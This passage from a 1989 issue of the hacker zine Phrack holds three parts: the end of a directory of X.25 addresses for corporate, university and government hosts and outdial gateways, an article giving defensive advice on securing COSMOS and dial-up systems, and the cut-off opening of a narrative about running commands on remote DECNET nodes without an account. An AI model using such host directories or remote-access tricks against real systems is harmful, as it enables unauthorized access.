  3135.   0311 030 100 364                 Primesoft
  3136. A 0311 030 100 38                  The Source
  3137. B 0311 030 100 633                 Toxnet (NLM)
  3138.   0311 030 101 26500               Informatics Inc
  3139.   0311 030 300 02000               Computer Sharing Services
  3140.   0311 030 300 021                 Colorado Outdial 2400 bps (Area 303)
  3141.   0311 030 300 02300               Broker Services Inc
  3142.   0311 030 300 115                 Colorado Outdial 1200 bps (Area 303)
  3143.   0311 030 301 13100               EDI Computer Services
  3144.   0311 030 301 13200               EDI Computer Services
  3145.   0311 030 301 13300               Energy Enterprises
  3146.   0311 030 500 121                 Florida Outdial 1200 bps (Area 305)
  3147.   0311 030 501 16300               Florida Computer Inc
  3148. D 0311 030 508 793                 Miami Outdial (Area 305) ?
  3149.   0311 031 200 02200               National Computer Network of Chicago
  3150.   0311 031 200 024                 Illinois Outdial 2400 bps (Area 217 ?)
  3151.   0311 031 200 03100               Continental Bank
  3152.   0311 031 200 03200               Continental Bank
  3153.   0311 031 200 04900               American Hospital Supply Corporation
  3154.   0311 031 200 411                 Illinois Outdial 1200 bps (Area 217 ?)
  3155.   0311 031 201 07300               Commodity Information Services
  3156.   0311 031 268 801      ADPUSA     ADP Network Services Ltd.
  3157.   0311 031 300 024                 Michigan Outdial 2400 bps (Area 313)
  3158.   0311 031 300 04000               ADP Network Services
  3159.   0311 031 300 06200               Merit International (MIT)
  3160.   0311 031 300 216                 Michigan Outdial 1200 bps (Area 313)
  3161.   0311 031 301 39800               Merit Computer
  3162.   0311 031 400 07200               Environmental DataNetwork Inc.
  3163.   0311 031 401 06500               McDonnel Douglas Automation (300 bps)
  3164.   0311 031 401 06600               McDonnel Douglas Automation (110 bps)
  3165.   0311 031 401 06700               McDonnel Douglas Automation (1200 bps)
  3166.   0311 031 401 61000               McDonnel Douglas Automation (300 bps)
  3167.   0311 031 500 02000               Bibliographic Retrieval Services
  3168. A 0311 040 100 612                 Modemcity
  3169. A 0311 040 400 114                 Georgia Outdial 1200 bps (Area 404)
  3170. A 0311 040 800 021                 California Outdial 1200 bps? (Area 408)
  3171.   0311 040 800 245                 Bridge
  3172. B 0311 040 800 246                 SCF
  3173.   0311 041 201 4600                On-Line Systems Inc
  3174.   0311 041 400 02000               A.O. Smith Data Systems Divisions
  3175.   0311 041 400 021                 Wisconsin Outdial 1200 bps (Area 414)
  3176. B 0311 041 500 020                 LRS-Dialog 2
  3177. A 0311 041 500 02000    DIALOG     Lockheed Information Systems
  3178.   0311 041 500 02000*D  DIALOG     Lockheed DIALOG service
  3179. B 0311 041 500 048                 LRS Dialog 2
  3180.   0311 041 500 04800    DIALOG2    Lockheed Information Systems 2
  3181.   0311 041 500 04800*D  DIALOG1    Lockheed DIALOG service
  3182.   0311 041 500 117                 California Outdial 1200 bps (Area 415)
  3183. I 0311 041 500 210                 Outdial USA
  3184. A 0311 041 500 215                 Outdial (Area 415)
  3185. A 0311 041 500 217                 Outdial (Area 415)
  3186. A 0311 041 500 220                 Outdial 1200 bps (Area 415)
  3187.   0311 041 500 48000               Lockheed Information Systems (?)
  3188. B 0311 041 500 607                 BIONET
  3189. B 0311 041 500 609                 INTELLIGENETICS
  3190.   0311 041 501 23600               Hydrocomp Inc (300 bps)
  3191.   0311 041 501 23700               Hydrocomp Inc (1200 bps)
  3192.   0311 041 501 26800               ITEL Corp (300 bps)
  3193.   0311 041 501 26900               ITEL Corp (1200 bps)
  3194.   0311 041 501 59700               Stanford Library Centre for Inform
  3195.                                    Processing
  3196.   0311 041 501 59700               Standard Centre for Information Processing
  3197. O 0311 050 006 1                   Nuclear Research
  3198. A 0311 050 300 020                 Outdial 300 bps (Area 503)
  3199. A 0311 050 300 021                 Oregon Outdial 1200 bps (Area 503)
  3200. B 0311 050 500 060                 ICN (=LASL)
  3201. B 0311 051 300 03000               Mead Data Central
  3202.   0311 051 501 39600               State University of New York
  3203.   0311 051 600 02200               Timesharing Resources
  3204. D 0311 060 200 020                 Outdial 300 bps (Area 602)
  3205. D 0311 060 200 021                 Outdial 1200 bps (Area 602)
  3206. B 0311 060 200 150                 Phoenix
  3207.   0311 060 201 60900               Timesharing Associates
  3208. B 0311 060 300 020                 Dartmouth College
  3209.   0311 060 300 02000    DARTMTH    Dartmouth College, USA
  3210.   0311 060 300 05000               Corporate Timesharing
  3211.   0311 060 301 54700               Raytheon Company Scientific Computer
  3212.                                    Service
  3213. X 0311 060 700 02000    CORNELL0   Cornell University (134.5 bps)
  3214. T 0311 060 700 02100    CORNELL1   Cornell University (300 bps)
  3215. T 0311 060 700 02200    CORNELL2   Cornell University (1200 bps)
  3216.   0311 060 700 02300    CORNELL3   Cornell University (1200 bps)
  3217.   0311 060 700 03600               TIPO Computer
  3218.   0311 060 702 00       CORNELL2   Cornell University
  3219.   0311 060 702 00       CORNELL2   Cornell University
  3220.   0311 060 800 02500               University of Wisconsin
  3221.   0311 060 801 6630                University of Wisconsin
  3222.   0311 060 900 4200                Dow-Jones
  3223.   0311 061 200 02500               Honeywell Inform Services Datanetwork
  3224.   0311 061 200 02700               Honeywell Inform Services Datanetwork
  3225.   0311 061 200 121                 Minnesota Outdial 1200 bps (Area 612)
  3226.   0311 061 201 06500               Honeywell Inform Services Datanetwork,
  3227.                                    300 bps
  3228.   0311 061 201 06500               Honeywell Inform Services Datanetwork
  3229.   0311 061 201 06600               Honeywell Inform Services Datanetwork,
  3230.                                    110 bps
  3231.   0311 061 201 06700               Honeywell Inform Services Datanetwork,
  3232.                                    300 bps
  3233.   0311 061 201 06900               Honeywell Inform Services Datanetwork,
  3234.                                    134 bps
  3235. B 0311 061 400 021                 CAS online
  3236. D 0311 061 400 02124    CASUSA     STN International
  3237.   0311 061 700 02000               Bolt Beranek & Newman
  3238.   0311 061 700 02300               Computer Corporation    of America
  3239.   0311 061 700 02400               AVCO Computer Services
  3240.   0311 061 700 03600               Data Resources Inc
  3241.   0311 061 700 03800               BBN-RCC
  3242.   0311 061 700 03800               Bolt Beranek & Newman
  3243.   0311 061 700 06700               Management Decision Systems Inc
  3244.   0311 061 700 07000               Interactive Science Corp
  3245.   0311 061 700 07600               Interactive Science Corp
  3246.   0311 061 700 08000               III Systems Inc
  3247. B 0311 061 700 08401               LCG
  3248.   0311 061 700 12000               Cullinane Corp
  3249.   0311 061 700 13700               Masachusetts Institute of Technology
  3250.   0311 061 700 13800               Masachusetts Institute of Technology
  3251.   0311 061 700 13900               Masachusetts Institute of Technology
  3252.   0311 061 700 14000               Masachusetts Institute of Technology
  3253. B 0311 061 700 270                 Waltham
  3254. B 0311 061 700 609                 Package
  3255. B 0311 061 700 613                 BBN10
  3256. B 0311 061 700 614                 BBNVAX
  3257.   0311 061 701 01600               Data Resources Inc (300 bps)
  3258.   0311 061 701 01900               Data Resources Inc (300 bps)
  3259.   0311 061 701 16100               First Data Division/ADP Inc
  3260.   0311 061 701 16200               First Data Division/ADP Inc
  3261.   0311 061 701 25800               Data Resources Inc (134.5 bps)
  3262.   0311 061 701 26900               Interactive Management Systems
  3263.   0311 061 701 27500               Masachusetts Institute of Technology
  3264.   0311 061 701 39000               Masachusetts Institute of Technology
  3265.   0311 061 701 40300               Masachusetts Institute of Technology
  3266.   0311 061 703 088                 Delphi
  3267.   0311 061 900 050                 California Outdial 1200 bps (Area 619)
  3268.   0311 070 300 02000               Litton Computer Services
  3269.   0311 070 300 02100               American Management Systems
  3270.   0311 070 300 056                 PRC Computer Centre Inc
  3271.   0311 070 300 117                 Virginia Outdial 2400 bps (Area 703)
  3272. B 0311 070 300 50000               NIH-EPA (CIS)
  3273.   0311 070 305 05200               Digital Broadcasting Corporation
  3274.   0311 071 300 024                 Texas Outdial 2400 bps (Area 713)
  3275.   0311 071 300 114                 Texas Outdial 1200 bps (Area 713)
  3276.   0311 071 301 08300               Corporate Services Inc
  3277.   0311 071 301 56500               Rice University
  3278.   0311 071 400 02000    SCIAPP     Science Applications Inc.
  3279.   0311 071 401 13700               Engineering Supervision Co
  3280.   0311 071 700 02000               Brodart Inc
  3281. A 0311 080 100 020                 Outdial 300 bps (Area 801)
  3282. A 0311 080 100 021                 Utah Outdial 1200 bps (Area 801)
  3283. B 0311 080 100 054                 ES
  3284.   0311 080 101 13700               Environmentech Information Systems
  3285.   0311 080 400 02000               Multiple Access Computer Group
  3286. X 0311 080 800 01046    UKIRTUK    Infra Red Telescope in Hawaii
  3287. X 0311 080 800 040      UKIRT      UK Infra Red Telescope in Hawaii
  3288. A 0311 081 300 020                 Outdial 300 bps (Area 813)
  3289. A 0311 081 300 021                 Florida Outdial 1200 bps (Area 813)
  3290. D 0311 081 305 518                 Tampa Outdial (Area 813) ?
  3291.   0311 081 800 021                 California Outdial 1200 bps (Area 818)
  3292. D 0311 090 900 80000   JPLM3      Jet Propulsion Laboratory mail 2, USA
  3293.   0311 090 900 8100                Telemail
  3294.   0311 091 400 02200               Electronic Tabulating Corporation
  3295.   0311 091 600 050                 California Outdial 1200 bps (Area 916)
  3296. A 0311 091 900 020                 Outdial 300 bps (Area 919)
  3297. A 0311 091 900 021                 Outdial 1200 bps (Area 919)
  3298.   0311 3                RCA        USA - RCA (RCAG)
  3299.   0311 9                           USA - TRT
  3300.   0312 4                           USA - FTCC
  3301.   0312 5                           USA - Uninet
  3302.   0312 521 210 1        DIALOG6    Lockheed Info Systems
  3303. D 0312 561 703 080                 UNINET
  3304. B 0312 561 703 088                 Delphi
  3305.   0312 6                AUTONET    USA - Autonet
  3306.   0312 688 01           AUTONET    AUTONET Information
  3307.   0312 7                           USA - Telenet
  3308.   0313 2                COMPU      USA - Compuserve
  3309.   0313 6                           USA - Geisco
  3310.   0334                             Mexico
  3311.   0334 0                           Telepac
  3312.   0340                  FA         French Antilles (Martinique (Curacau?))
  3313.   0340 0                           Dompac/NTI
  3314.   0342                  BDS        Barbados
  3315.   0342 235 191 9169
  3316.   0350                             Bermuda
  3317.   0350 3                           PSDS
  3318.   0425                  IL         Israel
  3319.   0425 1                           Isranet
  3320. B 0425 130 000 215                 Israelbox
  3321.   0426                  BRN        Bahrain
  3322.   0426 3                           BTC
  3323.   0431                  DXB        United Arab Emirates - Dubai
  3324.   0440                  J          Japan
  3325.   0440 1                           DDX-P
  3326. B 0440 129 431 04                  KEK VAX
  3327. B 0440 129 431 21                  Tsukuba Uni
  3328.   0440 8                VENUSP     Venus-P (Japanese data network)
  3329. I 0440 820 023                     KDD ?
  3330. B 0440 820 060 01       KDD        KDD Test Host, TOKYO
  3331.   0442
  3332. B 0442 110 403 25                  OKI
  3333. B 0442 433 403 07                  CMES
  3334.   0450                             South Korea
  3335.   0450 1                           Dacom/DNS
  3336.   0454                  HK         Hong Kong
  3337.   0454 2                           Intelpak
  3338.   0454 5                           Datapak
  3339. A 0454 550 010 4        HKDATA     Hong Kong DATAPAK Info
  3340. A 0454 550 043 1                   DATAFAX
  3341.   0487                             Taiwan
  3342.   0487 2                           Pacnet
  3343.   0487 7                           Udas
  3344.   0505                  AUS        Australia
  3345.   0505 2                           Austpac
  3346.   0505 228 621 000                 Anglo/Australian Observatory
  3347.   0505 228 621 001                 CSIRO Radio-Physics
  3348.   0505 228 621 001                 FTP for Epping
  3349.   0505 233 422 000      MELBUNI    Melbourne Univ. Australia
  3350. A 0505 273 720 000      UQ         Univ. of Queensland Australia
  3351. A 0505 273 720 000      UQXA       University of Queensland ANF-10 gateway
  3352. D 0505 273 722 0000                Uni Queensland
  3353.   0505 282 620 000                 FTP For Austek
  3354. A 0505 282 620 000                 VAX in Sidney, Australia
  3355.   0505 3                           Midas
  3356.   0505 321 000 1                   Network test
  3357.   0505 321 000 3                   MIDAS FOX Test
  3358.   0510                             Indonesia
  3359.   0510 1                           PSDS (1986)
  3360.   0525                  SGP        Singapore
  3361.   0525 2                           Telepac
  3362. A 0525 211 668 8        TELEPAC    Telepac Info
  3363.   0530                  NZ         New Zealand
  3364.   0530 1                           P.S.S. (Pacnet)
  3365.   0530 171 000 004      WAIKATO    Univ of Waikato New Zealand
  3366. B 0530 197 000 016                 ASMAIL
  3367.   0547                             Fr.Polyn.
  3368.   0547 0                           Tompac
  3369.   0612                             Ivory Coast
  3370.   0612 2                           Sytranpac
  3371.   0647                             Reunion
  3372.   0647 0                           Dompac/NIT
  3373.   0655                  ZA         South Africe
  3374.   0655 0                           Saponet
  3375. D 0655 011 101 207                 UNI-NET
  3376.   0714                             Panama
  3377.   0714 1                           Intelpac
  3378.   0722                             Argentinia
  3379.   0722 2                           Arpac
  3380. I 0722 221 110 0171
  3381.   0724                  BR         Brazil
  3382.   0724 0                           Interdata
  3383.   0724 1                           Renpac
  3384. D 0724 782 450 8                   Nuclear Research Institute
  3385.   0730                             Chile
  3386.   0730 0                           Entel
  3387.   0732                             Colombia
  3388.   0732 0
  3389.   0742                             French Guiana
  3390.   0742 0                           Dompac/NTI
  3391.   0900                             USA ?
  3392.   0900 0                           Dialnet
  3393.  
  3394. ==============================================================================
  3395. |
  3396. | Local addresses on KOMETH (0228 479 110 86):
  3397. |
  3398. |   11  KOMETH-Informations
  3399. |  120  Modems 1200 bps (predefined numbers, some with a PW)
  3400. |  124  Modems 2400 bps (     "        "   ,  "   "    a PW)
  3401. |  130  Modems 300 bps  (     "        "   ,  "   "    a PW)
  3402. |  1D0  RZ-VAX (EZRZ1)
  3403. |  300  ETZ-VAX (CUMULI)
  3404. |  520  ETHICS, Library database
  3405. |  D11  PSI-Informations
  3406. | C000  Time
  3407. | C025  X25 Gateway (RZU, with password)
  3408. | C011  NUZ-Informations
  3409. | C100  RZU, VM/SP, full-screen
  3410. |
  3411. | There are two information systems on the RZ-VAX:
  3412. |
  3413. |  MAC-BBS  BBS with Mac-specific informations. Access for validated users
  3414. |           only (that means that you have to type in your name, address and
  3415. |           whether you're a student at the ETH or not and then wait a few
  3416. |           days).
  3417. |           (Username=MAC)
  3418. |  VisInfo  Informations server of the VIS (Verein der InformatikStudenten)
  3419. |           Contains some boards with mail from several networks and from
  3420. |           local sources.  Has a CHAT (closed during prime time hours). Free
  3421. |           access.
  3422. |           (Username=VISINFO)
  3423. |
  3424. ===============================================================================
  3425. |
  3426. | Local addresses at CERN (0228 468 114 0510):
  3427. |
  3428. |   17  Lyon (own network)
  3429. |   23  PAD
  3430. |   31  VXOMEG
  3431. |   41  Wisconsin/Madison
  3432. |   42  CERNLINE 193
  3433. |   45  DECserver
  3434. |   51  ALEPH
  3435. |   56  MERLIN VAX
  3436. |   61  (Prompt )
  3437. |   72  Wylbur / VM
  3438. |  100  Wylbur / VM
  3439. |  101  VM/370 CERNVM
  3440. |  102  VM/370 CERNVMB
  3441. |  103  VM/370 CERNVM
  3442. |  110  VXLDB1 VAX 8650 VMS 4.6
  3443. |  111  Information
  3444. |  112  VXSB
  3445. |  115  VXLDB1
  3446. |  120  Service CAD_CAM (VAX 8650+VAX785)/SYSTEME=VMS 4.6
  3447. |  121  CAD_CAM
  3448. |  122  VXCERN
  3449. |  123  VXCERN
  3450. |  124  BSD
  3451. |  125  CERNVM
  3452. |  127  PAD
  3453. |  130  L3 test beam VXC3
  3454. |  137  ALEPH-TPC
  3455. |  140  VXEPEL
  3456. |  141  DECserver 200 ("user friendly")
  3457. |  142  CERNADD
  3458. |  146  VXEPEL
  3459. |  147  Uni Genf TEC VAXTEC
  3460. |  151  CCVAX / DECserver 200
  3461. |  152  Uni Genf WA70
  3462. |  154  ALEPH 750 Fastbus VAX
  3463. |  161  MCR
  3464. |  162  MCR
  3465. |  166  VXWA80
  3466. |  167  cernvax
  3467. |  170  VXINFN
  3468. |  175  ALEPH
  3469. |  176  MCR with HELP
  3470. |  X29  X25 Gateway
  3471. |
  3472. ===============================================================================
  3473. |
  3474. | Addresses on Merit (0228 468 114 0583):
  3475. |
  3476. |  The principal host computers on Merit are:
  3477. |
  3478. |   Name        System/machine       Organization           Location
  3479. |   ----        -----------------    -------------------    -------------
  3480. |   MSUnet-IBM  VM/CMS IBM 3090-180  Michigan State Univ    East Lansing
  3481. |    OU         Multics Honeywell    Oakland Univ           Rochester
  3482. |    UB         MTS IBM 3090-400     Univ of Michigan       Ann Arbor
  3483. |    UM         MTS IBM 3090-400     Univ of Michigan       Ann Arbor
  3484. |    WM         DECsystem-10         Western Michigan Univ  Kalamazoo
  3485. |    WU         MTS Amdahl 470V/8    Wayne State Univ       Detroit
  3486. |
  3487. |  If you have a question about the use of the Merit Network, call
  3488. |  (313) 764-9423 and ask for a user consultant.
  3489. |
  3490. |  Other host computers and services available on the Merit network:
  3491. |
  3492. |  Autonet             CMU-Cyber           CMU-IBM          Datapac
  3493. |  DIALOUT-AA          DIAL1200-AA         DIAL2400-AA      DIAL300-AA
  3494. |  EMU-VAX             IGW                 ITI              MAGNET
  3495. |  MSU-CLSI            MSU-CLVAX1          MSU-EGRNET       MSU-IBM
  3496. |  MSU                 MTU                 MTUS5            OU-SecsNet
  3497. |  RPI                 RUAC                Survey           Telenet
  3498. |  UM-Annex            UM-CIC              UM-CLINFO        UM-dippy
  3499. |  UM-DSC              UM-EnginHarris      UM-MMVAX         UM-Public-Service
  3500. |  UM-QuickSlides      UM-RAVAX            UM-zippy         UMD-LIB
  3501. |  UMLIB               UMLIB-300           WAYNEST1         WAYNEST2
  3502. |  WMU-CAE             WMU-Kanga           WMU-Pooh         WMU-Puff
  3503. |  WMU-Tigger          WMU-Winnie          WSU-CSVAX        WSU-ET
  3504. |  WSUNET              ZOOnet-KCollege     ZOOnet-KVCC      ZOOnet-Nazareth
  3505. |
  3506. |  Some of the other computers and services which can be accessed via Telenet,
  3507. |  Autonet, and Datapac:
  3508. |
  3509. |  ABA/NET             ACP                 ADPNS-261        ADPNS-3
  3510. |  ADPNS-446           ADPNS-9             Alberta          ARTFL
  3511. |  Automail-23         Automail-297        Boeing           British-Columbia
  3512. |  BRS                 Cal-Berkeley        Calgary          Caltech-HEP
  3513. |  Carnegie-DEC-20     Carnegie-MICOM      Carnegie-11/45   CompuServe
  3514. |  Comshare            Cornell             Dalhousie        DatapacInfo
  3515. |  Dialcom             Dialog              Dow-Jones        Guelph
  3516. |  Guelph-Cosy         Illinois            Illinois-Cyber   LEXIS
  3517. |  Manitoba            Maryland-Unix       McGill           MGH
  3518. |  Minnesota-Cyber     Minnesota-VAX       MIT-Multics      MIT-VM
  3519. |  Montreal            Natl-Lib-Med        NCAR-Telenet     New-Brunswick
  3520. |  Newsnet             NJIT-EIES           NLM              NLM-MCS
  3521. |  Notre-Dame          NRC                 NYTimes          OAG
  3522. |  Queens              Rice                SDC              SFU
  3523. |______________________________________________________________________________
  3524.  
  3525.  
  3526.                                 ==Phrack Inc.==
  3527.  
  3528.                      Volume Three, Issue 27, File 5 of 12
  3529.  
  3530.  
  3531.                                     COSMOS
  3532.  
  3533.                    COmputer System for Mainframe OperationS
  3534.  
  3535.                                    Part Two
  3536.  
  3537.                                 by King Arthur
  3538.  
  3539.  
  3540.      This article will present solutions to the computer security problems
  3541. presented in my previous file.  The following are simple but often neglected
  3542. items which if properly treated can immensely increase your company's computer
  3543. security.  These points apply not merely in regards to COSMOS, but to all
  3544. computers in all companies.
  3545.  
  3546.  
  3547. A) Dial-Up Security:
  3548.  
  3549.      When securing a computer system, regardless of its type, it's important to
  3550. remember this: the only way someone can remotely access your system is if there
  3551. is a dial-up line leading to that system.  If your system has a dial-up, make
  3552. sure that you have taken every possible precaution to secure that line.  "The
  3553. one piece of advice I would give is:  Be careful with dial-up lines," says
  3554. Bellcore's Ed Pinnes.
  3555.  
  3556.      Dave Imparato, Manager of Database Management at New York Telephone, says,
  3557. "We have devices that sit in front of our computers that you have to gain
  3558. access to.  In order to even get to COSMOS, there are three or four levels of
  3559. security you have to go through, and that's before you even get to the system."
  3560.  
  3561. Rules for protection of Dial-Up lines:
  3562.  
  3563. 1.  Have as few dial-up lines as possible.  Private lines or direct connections
  3564.     are often a viable replacement for dial-up lines.
  3565.  
  3566. 2.  If you must have phone lines going to your computer, use external hardware,
  3567.     if possible.  For instance, the Datakit Virtual Circuit Switch (VCS) will
  3568.     require a user to specify an "access password" and a system destination to
  3569.     specify which system you are calling.  The VCS would then connect you to
  3570.     the requested system which would prompt you for a login and password.
  3571.     Using hardware similar to this serves a double purpose:
  3572.  
  3573.          A) It is harder for someone to get into your computer, due to
  3574.             additional passwords;
  3575.  
  3576.          B) Employees need only dial a single number to access a number of
  3577.             systems.
  3578.  
  3579.     Another good type of hardware is a callback modem.  A callback modem will
  3580.     prompt users for a login and password.  If these are correct, the modem
  3581.     will automatically callback to a predetermined number.  At that point you
  3582.     would login to the computer.  The advantage of callback is that unless a
  3583.     call is placed from a certain phone, there is no way to connect.
  3584.     Unfortunately, this is not always efficient for systems with large numbers
  3585.     of users.
  3586.  
  3587.     Lastly, and the most effective means of access, is to have a system which
  3588.     does not identify itself.  A caller has to enter a secret password, which
  3589.     doesn't display on the screen.  If a caller doesn't type the correct
  3590.     password, the system will hang up, without ever telling the caller what has
  3591.     happened.
  3592.  
  3593. 3.  If you ever detect "hackers" calling a certain number, it is advisable to
  3594.     change that number.  Phone numbers should be unlisted.  According to a
  3595.     hacker, he once got the number to an AT&T computer by asking directory
  3596.     assistance for the number of AT&T at 976 Main Street.
  3597.  
  3598. 4.  If dial-up lines aren't used on nights or weekends, they should be
  3599.     disabled.  Computer hackers usually conduct their "business" on nights or
  3600.     weekends.  The COSMOS system has the ability to restrict access by time of
  3601.     day.
  3602.  
  3603.  
  3604. B) Password Security:
  3605.  
  3606.      Using the analogy between a computer and a file cabinet, you can compare a
  3607. password to the lock on your file cabinet.  By having accounts with no
  3608. passwords you are, in effect, leaving your file cabinet wide open.  A system's
  3609. users will often want passwords that are easy to remember.  This is not an
  3610. advisable idea, especially for a database system with many users.  The first
  3611. passwords tried by hackers are the obvious.  For instance if MF01 is known to
  3612. be the user name for the frame room, a hacker might try MF01, FRAME, MDF, or
  3613. MAINFRAME as passwords.  If it's known to a hacker that the supervisor at the
  3614. MDF is Peter Pinkerton,  PETE or PINKERTON would not be very good passwords.
  3615.  
  3616. Rules for password selection:
  3617.  
  3618. 1.  Passwords should be chosen by system administrators or the like.  Users
  3619.     will often choose passwords which provide no security.  They should not be
  3620.     within the reach of everybody in the computer room, but instead should be
  3621.     sent via company mail to the proper departments.
  3622.  
  3623. 2.  Passwords should be changed frequently, but on an irregular basis -- every
  3624.     four to seven weeks is advisable.  Department supervisors should be
  3625.     notified of password changes via mail, a week in advance.  This would
  3626.     ensure that all employees are aware of the change at the proper time.  One
  3627.     thing you don't want is mass confusion, where everybody is trying to figure
  3628.     out why they can't access their computers.
  3629.  
  3630. 3.  System administrators' passwords should be changed twice as often because
  3631.     they can allow access to all system resources.  If possible, system
  3632.     administrator accounts should be restricted from logging in on a dial-up
  3633.     line.
  3634.  
  3635. 4.  A password should NEVER be the same as the account name.  Make sure that
  3636.     ALL system defaults are changed.
  3637.  
  3638. 5.  Your best bet is to make passwords a random series of letters and  numbers.
  3639.     For example 3CB06W1, Q9IF0L4, or F4W21D0.  All passwords need not be the
  3640.     same length or format.  Imparato says, "We built a program in a PC that
  3641.     generates different security passwords for different systems and makes sure
  3642.     there's no duplication."
  3643.  
  3644. 6.  It's important to change passwords whenever an employee leaves the company
  3645.     or even changes departments.  Imparato says, "When managers leave our
  3646.     organization, we make sure we change those passwords which are necessary to
  3647.     operate the system."
  3648.  
  3649. 7.  The Unix operating system has a built-in "password aging" feature, which
  3650.     requires a mandatory change of passwords after a period of time.  If you
  3651.     run any Unix-based systems, it's important to activate password aging.
  3652.  
  3653. 8.  When you feel you have experienced a problem, change ALL passwords,  not
  3654.     just those passwords involved with the incident.
  3655.  
  3656.  
  3657. C) Site security:
  3658.  
  3659.      There have been a number of articles written by hackers and published in
  3660. 2600 Magazine dealing with garbage picking or what hackers call "trashing".
  3661. It's important to keep track of what you throw out.  In many companies,
  3662. proprietary operations manuals are thrown out.  COSMOS itself is not a
  3663. user-friendly system.  In other words, without previous exposure to the system
  3664. it would be very difficult to operate.  Bellcore's Beverly Cruse says, "COSMOS
  3665. is used in so many places around the country, I wouldn't be surprised if they
  3666. found books... in the garbage, especially after divestiture.  One interesting
  3667. thing about a COSMOS article written by hackers, is that there was a lot of
  3668. obsolete information, so it shows that wherever the information came from... it
  3669. was old."
  3670.  
  3671. Rules for site security:
  3672.  
  3673. 1.  Although it may seem evident, employees should be required to show proper
  3674.     identification when entering terminal rooms or computer facilities.  It's
  3675.     doubtful that a hacker would ever attempt to infiltrate any office, but
  3676.     hackers aren't the only people you have to worry about.
  3677.  
  3678. 2.  Urge employees to memorize login sequences.  It's a bad idea for passwords
  3679.     to be scribbled on bits of paper taped to terminals.  Eventually, one of
  3680.     those scraps may fall into the wrong hands.
  3681.  
  3682. 3.  Garbage should be protected as much as possible.  If you use a private
  3683.     pick-up, keep garbage in loading docks, basements, or fenced-off areas. If
  3684.     you put your garbage out for public sanitation department pick-up, it's a
  3685.     good idea to shred sensitive materials.
  3686.  
  3687. 4.  Before throwing out old manuals or books, see if another department could
  3688.     make use of them.  The more employees familiar with the system, the less of
  3689.     a chance that there will be a security problem.
  3690.  
  3691. 5.  Printing terminals should be inspected to make sure that passwords are not
  3692.     readable.  If passwords are found to echo, check to see if the duplex is
  3693.     correct.  Some operating systems allow you to configure dial-ups for
  3694.     printer use.
  3695.  
  3696.  
  3697. D) Employee Security:
  3698.  
  3699.      When a hacker impersonates an employee, unless he is not successful there
  3700. is a great chance the incident will go unreported.  Even if the hacker doesn't
  3701. sound like he knows what he's talking about, employees will often excuse the
  3702. call as an unintelligent or uninformed person.  It's unpleasant to have to
  3703. worry about every call with an unfamiliar voice on the other end of the phone,
  3704. but it is necessary.
  3705.  
  3706. Rules for employee security:
  3707.  
  3708. 1.  When making an inter-departmental call, always identify yourself with:
  3709.     1) Your name; 2) Your title; and 3) Your department and location.
  3710.  
  3711. 2.  Be suspicious of callers who sound like children, or those who ask you
  3712.     questions that are out of the ordinary.  Whenever someone seems suspicious,
  3713.     get their supervisor's name and a callback number.  Don't discuss anything
  3714.     sensitive until you can verify their identity.  Don't ever discuss
  3715.     passwords over the phone.
  3716.  
  3717. 3.  When there is a security problem with a system, send notices to all users
  3718.     instructing them not to discuss the system over the phone, especially if
  3719.     they do not already know the person to whom they are talking.
  3720.  
  3721. 4.  Remind all dial-up users of systems, before hanging up.
  3722.  
  3723. 5.  If security-minded posters are put up around the workplace, employees are
  3724.     bound to take more care in their work and in conversations on the phone.
  3725.  
  3726. 6.  If managers distribute this and other computer security articles to
  3727.     department supervisors employee security will be increased.
  3728.  
  3729.  
  3730. E) General Security:
  3731.  
  3732.      Bellcore recently sent a package to all system administrators of COSMOS
  3733. systems.  The package detailed security procedures  which applied to COSMOS and
  3734. Unix-based systems.  If you are a recipient of this package, you should re-read
  3735. it thoroughly to ensure that your systems are secure.  Cruse says, "Last
  3736. year... I had a call from someone within an operating company with a COSMOS
  3737. security problem.  All we really did was give them documentation which reminded
  3738. them of existing security features...  There is built-in security in the COSNIX
  3739. operating system...  We really didn't give them anything new at the time.  The
  3740. features were already there; we gave them the recommendation that they
  3741. implement all of them."
  3742.  
  3743.      If you feel you may not be using available security features to the
  3744. fullest, contact the vendors of your computer systems and request documentation
  3745. on security.  Find out if there are security features that you may not be
  3746. currently taking advantage of.  There are also third party software companies
  3747. that sell security packages for various operating systems and computers.
  3748.  
  3749.      Computer security is a very delicate subject.  Many people try to pretend
  3750. that there is no such thing as computer crime.  Since the problem exists, the
  3751. best thing to do is to study the problems and figure out the best possible
  3752. solutions.  If more people were to write or report about computer security, it
  3753. would be easier for everyone else to protect themselves.  I would like to see
  3754. Bellcore publish security guidelines, available to the entire
  3755. telecommunications industry.  Keep in mind, a chain is only as strong as its
  3756. weakest link.
  3757. _______________________________________________________________________________
  3758.  
  3759.  
  3760.                                 ==Phrack Inc.==
  3761.  
  3762.                      Volume Three, Issue 27, File 6 of 12
  3763.  
  3764.                  <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>>
  3765.                  <<<                                       >>>
  3766.                  <<<       Looking Around In DECNET        >>>
  3767.                  <<<                                       >>>
  3768.                  <<<    by Deep Thought of West Germany    >>>
  3769.                  <<<                                       >>>
  3770.                  <<<             June 1, 1989              >>>
  3771.                  <<<                                       >>>
  3772.                  <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>>
  3773.  
  3774.  
  3775. Disclaimer:  I take no responsibility for any use or abuse of the information
  3776.              contained in this article, nor for any damage caused by the use of
  3777.              methods described.  DECNET, VAX, and VMS are possibly registered
  3778.              trademarks of Digital Equipment Corporation.
  3779.  
  3780.  
  3781. There comes a time when every somewhat intelligent programmer asks:  Is hacking
  3782. difficult?  Now, being in a university network, why don't just give it a try?
  3783. Since one is an official student and somewhat authorized to use the computing
  3784. facilities, testing the modern means of communication should cause no trouble.
  3785.  
  3786. Well, you start searching on those nodes, you have official access for
  3787. interesting programs and procedures.  And you find:  Netdcl, just one program
  3788. of many, that obviously enables one to run commands on remote nodes without
  3789. having an account on these nodes.  A really interesting thing, as nearly
  3790. everything is allowed that a normal user can do.
  3791.  
  3792. The dear reader may start to think:  Wasn't there always the shouting about VMS
  3793. being the MOST SECURE computer system, making it UNPENETRABLE to hackers?  Ok,
  3794. cool down, this feature can be disabled and so, you think, if someone has super
  3795. secret data on his VAX, he will stop any use or abuse of this feature.
  3796.  
  3797. 2nd Act -- Somewhere one has heard about some mystery things called system
  3798. calls.  Since one always wanted to know about how to react on keystrokes on a
  3799. VAX (really being not trivial!) you start reading the manuals more precisely to
  3800. find out how to do it in Pascal.
  3801.  
  3802. Randomly on browsing thru the pages you discover functions which deliver
  3803. information about Userids.  This comes in handy, as a friend engaged in
  3804. university politics wants to distribute a leaflet by email to all registered
